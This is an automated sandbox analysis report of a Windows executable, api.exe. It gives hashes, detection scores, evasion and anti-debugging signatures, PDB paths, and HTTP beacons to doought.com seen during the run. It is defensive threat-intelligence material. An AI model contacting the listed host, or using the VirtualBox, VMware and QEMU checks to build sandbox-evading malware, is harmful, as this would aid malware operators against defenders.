Play interactive tour

Edit tour

Analysis Report api.exe

Overview

General Information

Sample Name:	api.exe
Analysis ID:	371964
MD5:	b63932cde2143b739551fa5501394146
SHA1:	3d64abbc533021eb46a860d13f8465d2e448fcd3
SHA256:	c592d92f14fd97f4f4b29a3c71ec2a119d4cf5df4750f76fc455e1f82bc8b798
Infos:
Most interesting Screenshot:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Machine Learning detection for sample

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

api.exe (PID: 2588 cmdline: 'C:\Users\user\Desktop\api.exe' MD5: B63932CDE2143B739551FA5501394146)

WerFault.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 712 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Compliance
• Spreading
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: api.exe	Virustotal: Detection: 44%			Perma Link
Source: api.exe	ReversingLabs: Detection: 34%

Machine Learning detection for sample

Show sources

Source: api.exe

Joe Sandbox ML: detected

Source: api.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: api.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: urlmon.pdb&t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.639234027.00000000034C2000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbZt&& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.639192907.00000000033C0000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbtx&` source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb2t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: webio.pdbNt2& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.639201883.00000000033CC000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb>t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb\t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.639192907.00000000033C0000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\ser\Downloads\new flow IVAN\ivan_test\loader_test\Release\WindowsProject1.pdb( source: api.exe
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdbPt(&n source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: WindowsProject1.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdbDt4& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb(t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\ser\Downloads\new flow IVAN\ivan_test\loader_test\Release\WindowsProject1.pdb source: api.exe
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb4t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.642187842.0000000005406000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.639201883.00000000033CC000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.639197452.00000000033C6000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000004.00000003.642187842.0000000005406000.00000004.00000040.sdmp

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F398DE FindFirstFileExW,

Source: global traffic	HTTP traffic detected: GET /evreigate.php HTTP/1.1Connection: Keep-AliveUser-Agent: deus vultHost: doought.com
Source: global traffic	HTTP traffic detected: GET /hit.php?a=%7BbWW0uZJNBoadTsmEUEzhG%7Did=29 HTTP/1.1Connection: Keep-AliveUser-Agent: deus vultHost: doought.com

Source: unknown

DNS traffic detected: queries for: doought.com

Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F36070
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2E229
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F28BC0
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F3E3A9
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2DB60
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F21B30
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F42337
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2E4F0
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F3DC96
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F42457
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F3FC35
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2DC0D
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F29D10
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F3BEFB
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F326B7
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2E7AB
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2DF7F

Source: C:\Users\user\Desktop\api.exe

Code function: String function: 00F2B2A0 appears 37 times

Source: C:\Users\user\Desktop\api.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 712

Source: api.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: api.exe, 00000000.00000002.654322369.0000000000EF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs api.exe
Source: api.exe	Binary or memory string: OriginalFilenameGoogleUpdateSetup.exe< vs api.exe

Source: api.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal64.evad.winEXE@2/4@1/2

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F226D0 RegOpenKeyExA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,Process32Next,Process32Next,lstrcmpiA,Process32Next,FindCloseChangeNotification,CloseHandle,

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2588

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBBD.tmp

Jump to behavior

Source: C:\Users\user\Desktop\api.exe	Command line argument: VMWARE
Source: C:\Users\user\Desktop\api.exe	Command line argument: Identifier
Source: C:\Users\user\Desktop\api.exe	Command line argument: qemu-ga.exe
Source: C:\Users\user\Desktop\api.exe	Command line argument: arga\
Source: C:\Users\user\Desktop\api.exe	Command line argument: anandamarga
Source: C:\Users\user\Desktop\api.exe	Command line argument: rga
Source: C:\Users\user\Desktop\api.exe	Command line argument: arga\
Source: C:\Users\user\Desktop\api.exe	Command line argument: anandamarga
Source: C:\Users\user\Desktop\api.exe	Command line argument: urlmon.dll
Source: C:\Users\user\Desktop\api.exe	Command line argument: }id=29
Source: C:\Users\user\Desktop\api.exe	Command line argument: evreigate.php
Source: C:\Users\user\Desktop\api.exe	Command line argument: doought.com
Source: C:\Users\user\Desktop\api.exe	Command line argument: string
Source: C:\Users\user\Desktop\api.exe	Command line argument: doought.com
Source: C:\Users\user\Desktop\api.exe	Command line argument: doought.com
Source: C:\Users\user\Desktop\api.exe	Command line argument: url
Source: C:\Users\user\Desktop\api.exe	Command line argument: count
Source: C:\Users\user\Desktop\api.exe	Command line argument: doought.com

Source: api.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\api.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\api.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\api.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: api.exe	Virustotal: Detection: 44%
Source: api.exe	ReversingLabs: Detection: 34%

Source: api.exe	String found in binary or memory: %1!s!-Installer
Source: api.exe	String found in binary or memory: r den %1!s!-Installer wird Windows 2000 Service Pack 4 oder h
Source: api.exe	String found in binary or memory: Installer ng %1!s! Hindi Alam na Error ng InstallerlNabigo ang pag-install. Nangangailangan ang Installer ng %1!s! ng Windows 2000 Service Pack 4 o mas mahusay.

Source: unknown	Process created: C:\Users\user\Desktop\api.exe 'C:\Users\user\Desktop\api.exe'
Source: C:\Users\user\Desktop\api.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 712

Source: api.exe

Static file information: File size 2071040 > 1048576

Source: api.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x132400

Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: api.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: api.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: api.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: urlmon.pdb&t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.639234027.00000000034C2000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbZt&& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.639192907.00000000033C0000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbtx&` source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb2t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: webio.pdbNt2& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: urlmon.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.639201883.00000000033CC000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb>t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb\t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.639192907.00000000033C0000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\ser\Downloads\new flow IVAN\ivan_test\loader_test\Release\WindowsProject1.pdb( source: api.exe
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdbPt(&n source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: WindowsProject1.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdbDt4& source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb(t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\ser\Downloads\new flow IVAN\ivan_test\loader_test\Release\WindowsProject1.pdb source: api.exe
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb4t source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.642187842.0000000005406000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000004.00000003.642150416.0000000005402000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.639201883.00000000033CC000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.642183440.0000000005400000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.639197452.00000000033C6000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.642130706.00000000052E1000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 00000004.00000003.642165539.0000000005409000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000004.00000003.642187842.0000000005406000.00000004.00000040.sdmp

Source: api.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: api.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: api.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: api.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: api.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F24490 RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegGetValueA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,LoadLibraryA,GetProcAddress,KiUserExceptionDispatcher,Sleep,Sleep,ExitProcess,RegCloseKey,ExitProcess,

Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2B2E6 push ecx; ret
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F42FE5 push ecx; ret

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F2BFA6 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Users\user\Desktop\api.exe	Code function: HARDWARE\ACPI\DSDT\VBOX__ SOFTWARE\VMware, Inc.\VMware Tools SOFTWARE\VMware, Inc.\VMware Tools VMWARE qemu-ga.exe qemu-ga.exe
Source: C:\Users\user\Desktop\api.exe	Code function: qemu-ga.exe qemu-ga.exe

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Show sources

Source: C:\Users\user\Desktop\api.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: api.exe	Binary or memory string: QEMU-GA.EXE
